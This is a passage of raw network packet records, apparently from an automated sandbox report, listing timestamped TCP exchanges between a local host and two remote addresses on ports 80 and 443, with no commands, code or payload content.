                                                Sep 11, 2024 20:22:16.893501997 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893511057 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893536091 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893543005 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893568993 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893575907 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893614054 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893619061 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893656969 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893666029 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893688917 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893696070 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893728018 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893733978 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893759012 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893767118 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893798113 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893812895 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893860102 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893867016 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893902063 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893910885 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893950939 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.893953085 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.893995047 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894002914 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894037008 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894047022 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894071102 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894077063 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894105911 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894112110 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894140005 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894154072 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894171953 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894172907 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894212961 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894222975 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894258022 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894289017 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894294977 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894328117 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894340992 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894382000 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894388914 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894424915 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894428968 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894459009 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894464970 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894495010 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894499063 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894527912 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894534111 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894562960 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894567966 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894598007 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894599915 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894632101 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894639969 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894665956 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894670010 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894704103 CEST804916145.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:16.894704103 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:16.894747019 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:17.501527071 CEST4916180192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:20.658941984 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:20.658993006 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:20.659040928 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:20.664865017 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:20.664894104 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.539673090 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.539803028 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.547404051 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.547419071 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.548783064 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.629261017 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.675414085 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999780893 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999864101 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999883890 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999902964 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999927998 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.999959946 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999972105 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.999978065 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:21.999995947 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:21.999996901 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.000015020 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.000017881 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.000044107 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.000062943 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.000082970 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.000633001 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.063827991 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.063925982 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.063967943 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.063998938 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.064033031 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.070578098 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.150960922 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.151047945 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.151065111 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.151096106 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.151130915 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.213587046 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.213666916 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.213706017 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.213733912 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.213804960 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.213804007 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.213839054 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.213874102 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.214413881 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.214435101 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.214476109 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.214502096 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.214551926 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.216356039 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.216411114 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.216427088 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.216481924 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.277069092 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.277121067 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.277158022 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.277189970 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.277204037 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.277204037 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.309245110 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.309289932 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.309318066 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.309333086 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.309389114 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.309422970 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.310472012 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.310503006 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.310530901 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.310539961 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.310548067 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.310554028 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.311448097 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.311486006 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.311517954 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.311523914 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.311537981 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.312369108 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.312398911 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.312424898 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.312433004 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.312442064 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.312454939 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.313477039 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.313512087 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.313534975 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.313541889 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.313549995 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.313572884 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.313596010 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.314805984 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.314838886 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.314867973 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.314876080 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.314883947 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.314883947 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.335608006 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.335644960 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.335665941 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.335685015 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.335705042 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.335736036 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.369602919 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.369638920 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.369682074 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.369704962 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.369715929 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.369740963 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.405942917 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.406035900 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.406038046 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.406074047 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.406105042 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.406420946 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.406486034 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.406490088 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.406517982 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.406548977 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.406956911 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.407016993 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.407032013 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.407057047 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.407089949 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.407588959 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.407659054 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.407680035 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.407697916 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.407749891 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.407757998 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.408132076 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.408190012 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.408198118 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.408217907 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.408276081 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.408282995 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.408653975 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.408706903 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.408715963 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.408734083 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.408787966 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.408797026 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.414673090 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.461879969 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.461916924 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.461991072 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.462018013 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.462045908 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.462045908 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.462373018 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.462409973 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.462420940 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.462428093 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.462450981 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.498848915 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.498883963 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.498984098 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.499011993 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.499023914 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.499249935 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.499284029 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.499299049 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.499310970 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.499321938 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.499835968 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.499862909 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.499878883 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.499886036 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.499893904 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.499914885 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.500644922 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.500674963 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.500690937 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.500696898 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.500705957 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.500725985 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.500984907 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.501014948 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.501029015 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.501036882 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.501044989 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.501063108 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.501454115 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.501483917 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.501498938 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.501503944 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.501512051 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.501533031 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.566674948 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.566764116 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.567018986 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.567018986 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.567018986 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.567070961 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.567254066 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.567326069 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.567337036 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.567370892 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.567408085 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.591016054 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.591084957 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.591361046 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.591361046 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.591396093 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.591603994 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.591675997 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.591681957 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.591711044 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.591734886 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.592094898 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.592161894 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.592173100 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.592187881 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.592233896 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.592240095 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.592731953 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.592765093 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.592783928 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.592793941 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.592811108 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.593255997 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.593285084 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.593307018 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.593313932 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.593327999 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.593333960 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.593713045 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.593744993 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.593764067 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.593770027 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.593791962 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.799410105 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.799489021 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.869353056 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.869446993 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.869652033 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.869652033 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.869652033 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.869684935 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.869756937 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.869821072 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.869832993 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.869865894 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.869894028 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.870927095 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.870985985 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.870995045 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.871026039 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.871052980 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.871515036 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.871592999 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.871601105 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.871663094 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.871690989 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.872071028 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.872126102 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.872140884 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.872169018 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.872196913 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.873164892 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.873224974 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.873229027 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.873245001 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.873281002 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.873300076 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.873328924 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.873353004 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.873368025 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.873385906 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.873435020 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.874161959 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.874193907 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.874208927 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:22.874217987 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:22.874233007 CEST49162443192.168.2.22207.241.227.96
